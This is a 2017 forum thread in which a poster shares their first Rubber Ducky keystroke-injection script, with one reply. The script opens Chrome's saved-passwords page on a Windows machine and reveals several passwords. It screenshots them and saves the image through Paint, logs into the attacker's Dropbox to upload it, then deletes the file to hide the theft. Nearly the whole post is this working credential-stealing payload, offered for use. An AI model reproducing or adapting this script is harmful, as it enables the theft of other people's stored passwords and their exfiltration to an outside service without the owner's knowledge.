CztHrm Posted May 4, 2017 Posted May 4, 2017 Just started fiddling around with learning how to do these. It works and uploaded well for me. Reason I did this was to bypass the emailing code. Never could seem to get it to work. This will open the saved passwords, make them visible, and take a prntscrn. Then it will open paint, paste it, and save it. Then it will open the internet, log into to Dropbox with the credentials you provide, and upload it. Then it will close the browser and delete the file. If I have any mess ups please let me know. Will be adding fail-safes throughout over the course of the next few days. Please keep in mind this is the first one I made. I wanted to make something that would work for me the way I wanted it. Please let me know what you think. :) REM Author: Czt_Hrm REM R_Ducky chrome password PRNTSCRN with Dropbox upload REM Target: Windows xp, Vista, 7, 8, 10 (Tested on windows vista, 7, 8, 10) REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, makes REM the first few passwords visible, screenshots and uploads to dropbox. REM saves to C:\downloads\ folder to bypass C drive UAC. REM If you want to you can change the save location. Saves to C that way it doesn't have to add the "USER" to the path. REM Then Deletes the file. DELAY 2000 REM -------------open chrome GUI r DELAY 1000 STRING chrome DELAY 1000 ENTER DELAY 1000 REM -------------navigates to passwords and reveals them for screenshot STRING chrome://settings/passwords ENTER DELAY 800 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER DELAY 100 DOWN DELAY 100 TAB DELAY 100 ENTER DELAY 100 DOWN DELAY 100 TAB DELAY 100 ENTER DELAY 100 DOWN DELAY 100 TAB DELAY 100 ENTER DELAY 100 PRINTSCREEN DELAY 500 ALT F4 DELAY 200 GUI r DELAY 500 STRING mspaint DELAY 500 REM ----------- CTRL-SHIFT ENTER opens the executable as administrator CTRL-SHIFT ENTER DELAY 600 REM ----------- Added as a failsafe to allow admin paint to run under UAC LEFT DELAY 100 ENTER DELAY 100 CTRL V DELAY 500 CTRL S DELAY 200 REM ------------ Saves it to the downloads folder in :/C to also bypass UAC if paint fails to open as Admin STRING C:\downloads\TheFamily.jpg DELAY 300 ENTER DELAY 500 ALT F4 DELAY 200 REM ------------ Open Chrome again GUI r DELAY 1000 STRING chrome DELAY 1000 ENTER DELAY 600 REM ------------- Opens the dropbox login page STRING https://www.dropbox.com/login?_tk=fof DELAY 600 ENTER DELAY 2000 REM -------------- Input dropbox username whereas "USER@MAIL.COM" STRING USER@MAIL.COM DELAY 1000 TAB DELAY 1000 REM -------------- Input password where it says "PASSWORD" STRING PASSWORD DELAY 2000 REM -------------- All the tabs locate the upload button TAB DELAY 500 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER DELAY 200 REM -------------- Location where it was saved STRING C:\downloads\TheFamily.jpg DELAY 200 ENTER DELAY 3000 ALT F4 REM -------------- Navigate to and Delete the saved file DELAY 2000 GUI r DELAY 500 STRING cmd DELAY 500 STRING del C:\downloads\TheFamily.jpg DELAY 500 Quote
untitled Posted May 6, 2017 Posted May 6, 2017 That's actually pretty interesting, I might use this in the future. Thanks! Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.